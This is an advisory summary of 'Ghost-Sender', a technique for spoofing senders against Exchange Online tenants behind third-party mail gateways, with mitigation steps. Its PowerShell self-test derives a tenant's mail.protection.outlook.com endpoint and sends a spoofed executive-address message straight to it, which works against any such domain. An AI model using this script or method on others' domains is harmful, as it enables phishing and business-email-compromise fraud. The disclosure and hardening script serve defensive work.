Author: Lucas Dodgson, Tobias Oberdörfer, Robin Hilber
Published: June 9, 2026
Source: https://labs.infoguard.ch/posts/ghost-sender/
Summary
InfoGuard Labs disclosed “Ghost-Sender,” a universal email spoofing technique against Microsoft Exchange Online. When a tenant routes inbound mail through a third-party gateway via an external MX record, an attacker can bypass that gateway entirely by speaking SMTP directly to the tenant’s *.mail.protection.outlook.com endpoint. Exchange Online accepts these messages regardless of SPF, DKIM, or DMARC results, allowing arbitrary sender spoofing — including internal addresses — with delivery straight to the inbox. According to the researchers, under half of environments with an external MX record have a mitigation applied, and over 20% of scanned bug-bounty domains using Exchange Online appear vulnerable.
Technical Details
Many organizations point their domain's MX record at a third-party spam filter or mail security gateway rather than at Microsoft, expecting every inbound message to be filtered before it reaches Exchange Online. The gateway then relays mail to the tenant's Microsoft-side acceptance endpoint, <tenant>.mail.protection.outlook.com, but that endpoint stays reachable from the public internet, and its name is predictable because it is derived from the domain itself (contoso.com becomes contoso-com.mail.protection.outlook.com). By pointing an ordinary SMTP client at that endpoint (the researchers demonstrate a single PowerShell one-liner), an attacker delivers mail that never traverses the external gateway. The root cause is that, in the default configuration, Exchange Online does not enforce sender authentication on this direct mail flow: it accepts the message even though SPF, DKIM, and DMARC all fail for the spoofed domain, instead of rejecting it. Microsoft characterizes the behavior as an architectural limitation of "Direct Send" rather than a vulnerability, so no CVE has been assigned. On-premises Exchange deployments running in hybrid mode are affected as well.
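As an added illustration of the direct-submission path described above (this is not code from the InfoGuard post or from its testing tool), the following PowerShell snippet checks whether a domain you administer exposes the gap: it resolves the public MX record, derives the tenant's Microsoft endpoint from the domain name, confirms the endpoint answers on SMTP, and submits one test message straight to it. The domain, the addresses and the recipient are placeholders; run it only against your own tenant, and treat the result as positive only if the message lands in the recipient's inbox.

```powershell
# Added example, not part of the InfoGuard post. Placeholders: example.com is a domain you own
# and $Recipient is your own mailbox. Resolve-DnsName needs the DnsClient module (Windows).
$Domain    = 'example.com'
$Recipient = "you@$Domain"

# Exchange Online names the tenant endpoint after the domain, with dots replaced by dashes
# (contoso.com -> contoso-com.mail.protection.outlook.com). No tenant access is needed to derive it.
$Endpoint = ($Domain -replace '\.', '-') + '.mail.protection.outlook.com'

# 1. Where does the public MX point? Any MX outside *.mail.protection.outlook.com means a
#    third-party gateway is expected to see all inbound mail before Exchange Online does.
$mx = @(Resolve-DnsName -Name $Domain -Type MX -ErrorAction Stop |
        Where-Object { $_.QueryType -eq 'MX' } | Sort-Object Preference)
$mx | Format-Table Preference, NameExchange -AutoSize
$usesExternalGateway = @($mx | Where-Object { $_.NameExchange -notlike '*.mail.protection.outlook.com' }).Count -gt 0

# 2. Is the Microsoft endpoint reachable on tcp/25 from a host that is not the gateway?
$client = [System.Net.Sockets.TcpClient]::new()
try   { $client.Connect($Endpoint, 25); $reachable = $client.Connected }
catch { $reachable = $false }
finally { $client.Dispose() }

if (-not $usesExternalGateway) {
    Write-Host "MX for $Domain already points at Microsoft; there is no gateway to bypass here."
} elseif (-not $reachable) {
    Write-Host "$Endpoint did not answer on tcp/25 from this network."
} else {
    # 3. Submit one message directly to the tenant endpoint, skipping the gateway in the MX record.
    #    The From address is spoofed on purpose; this host is not in the domain's SPF record.
    #    Send-MailMessage is marked obsolete in PowerShell 7 but still works; -UseSsl requests STARTTLS.
    try {
        Send-MailMessage -SmtpServer $Endpoint -Port 25 -UseSsl -ErrorAction Stop `
            -From "ceo@$Domain" -To $Recipient `
            -Subject 'Ghost-Sender self-test' `
            -Body "Submitted directly to $Endpoint at $(Get-Date -Format o), bypassing $($mx[0].NameExchange)."
        Write-Host "Accepted by $Endpoint. Now check $Recipient: inbox = exposed; junk or quarantine = filtered; no delivery = blocked."
    } catch {
        # An SMTP rejection at this point means a connector restriction or Direct Send rejection is in place.
        Write-Host "Rejected by $Endpoint`: $($_.Exception.Message)"
    }
}
```

The acceptance of the message at the SMTP level is not the result that matters; Exchange Online may accept and then junk or quarantine it, so the verdict comes from where the message ends up in the test mailbox.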
Impact
An attacker needs only a target domain whose MX record points at an external gateway, that domain's mail.protection.outlook.com hostname (which can be derived from the domain name), and an SMTP client. With these, they can spoof arbitrary internal or external senders and have messages delivered directly to recipients' inboxes. Because the message is handled like legitimate internal traffic, Exchange Online may even resolve the profile picture of a spoofed internal sender, which adds credibility. Practical abuse includes targeted phishing, CEO/business-email-compromise fraud, and fake billing notices (for example, purporting to come from billing@microsoft.com). The affected products are Microsoft Exchange Online and on-premises Exchange in hybrid mode.
Mitigation
No patch is available, as Microsoft treats the behavior as expected. InfoGuard and Microsoft recommend hardening the tenant configuration:
- Configure a Partner Organization inbound connector that uses wildcard matching with IP address and/or TLS certificate validation, so only the legitimate gateway can submit mail.
- Add a mail flow (transport) rule at priority 0, so that it is evaluated before every other rule, that quarantines inbound email which fails authentication.
- Disable Direct Send where no device or application relies on it, using the tenant-level Direct Send rejection control Microsoft introduced (see the references below).
- Verify exposure using the researchers’ testing tool at ghost-sender.com, and review tenant posture with Microsoft’s Configuration Analyzer and preset security policies.
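The hardening items above translate into a short Exchange Online PowerShell session. The following is an added example, not a script from InfoGuard or Microsoft: the gateway's IP addresses, the certificate name and the connector and rule names are placeholders, and the compauth=fail header condition used to express "unauthenticated" in the priority-0 rule is an assumption that you should confirm against the Authentication-Results headers stamped in your own tenant before relying on it.

```powershell
# Added example, not InfoGuard's or Microsoft's own script. Assumptions (placeholders):
# 203.0.113.10 and 203.0.113.11 are the gateway's egress addresses and gateway.example.net is the
# CN on its TLS certificate; replace both with the values your provider publishes.
# Requires the ExchangeOnlineManagement module (Install-Module ExchangeOnlineManagement).
Connect-ExchangeOnline

$GatewayIPs  = @('203.0.113.10', '203.0.113.11')   # assumption: gateway egress addresses
$GatewayCert = 'gateway.example.net'               # assumption: CN on the gateway's TLS certificate

# 1. Partner connector with wildcard sender domains, pinned to the gateway's IP addresses.
#    RestrictDomainsToIPAddresses makes Exchange Online reject mail for the listed sender domains
#    (here: all of them) when it does not arrive from SenderIPAddresses, so a direct submission to
#    <tenant>.mail.protection.outlook.com from anywhere else is refused at the SMTP level.
#    EFSkipLastIP turns on Enhanced Filtering so SPF/DMARC are evaluated on the hop before the gateway,
#    which is what lets gateway-relayed mail pass the rule in step 2.
New-InboundConnector -Name 'Inbound from mail gateway' `
    -ConnectorType Partner `
    -SenderDomains '*' `
    -RestrictDomainsToIPAddresses $true `
    -SenderIPAddresses $GatewayIPs `
    -RequireTls $true `
    -EFSkipLastIP $true

# Alternative to IP pinning: pin on the gateway's TLS certificate instead of its addresses:
#   New-InboundConnector -Name 'Inbound from mail gateway' -ConnectorType Partner -SenderDomains '*' `
#       -RequireTls $true -RestrictDomainsToCertificate $true -TlsSenderCertificateName $GatewayCert

# 2. Priority-0 mail flow rule: quarantine inbound mail that failed composite authentication.
#    Assumption: 'compauth=fail' in the Authentication-Results header that Exchange Online adds on
#    receipt is the signal; verify the exact token in your tenant's headers before enabling this.
New-TransportRule -Name 'Quarantine unauthenticated inbound mail' `
    -Priority 0 `
    -HeaderContainsMessageHeader 'Authentication-Results' `
    -HeaderContainsWords 'compauth=fail' `
    -Quarantine $true `
    -Comments 'Ghost-Sender mitigation: direct submissions that bypass the mail gateway'

# 3. Reject Direct Send tenant-wide where no printer, scanner or application depends on it.
Set-OrganizationConfig -RejectDirectSend $true

# 4. Read back the resulting configuration.
Get-InboundConnector -Identity 'Inbound from mail gateway' |
    Format-List Enabled, ConnectorType, SenderDomains, RestrictDomainsToIPAddresses, SenderIPAddresses, RequireTls, EFSkipLastIP
Get-TransportRule -Identity 'Quarantine unauthenticated inbound mail' |
    Format-List Priority, State, HeaderContainsMessageHeader, HeaderContainsWords, Quarantine
Get-OrganizationConfig | Format-List RejectDirectSend
```

Stage these changes one at a time and re-run the self-test against your own domain after each: the connector alone already refuses direct submissions, the rule catches whatever still slips through another connector, and the Direct Send rejection also stops legitimate on-premises devices that relay to the endpoint without authentication, so inventory those before turning it on.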
References
- Ghost-Sender – Universal Email Spoofing against Exchange Online
- Ghost-Sender — vulnerability testing tool
- Microsoft: Direct Send vs sending directly to an Exchange Online tenant
- Microsoft: Introducing more control over Direct Send in Exchange Online
- Microsoft: Change Optics Report (public preview)
- Microsoft: Inbound connector FAQ
- Microsoft: Anti-phishing policies — spoof protection and sender DMARC policies
- Microsoft Defender: Configuration Analyzer
- Microsoft Defender: Preset security policies
- InfoGuard Labs on GitHub
- InfoGuard — Penetration Testing & Red Team services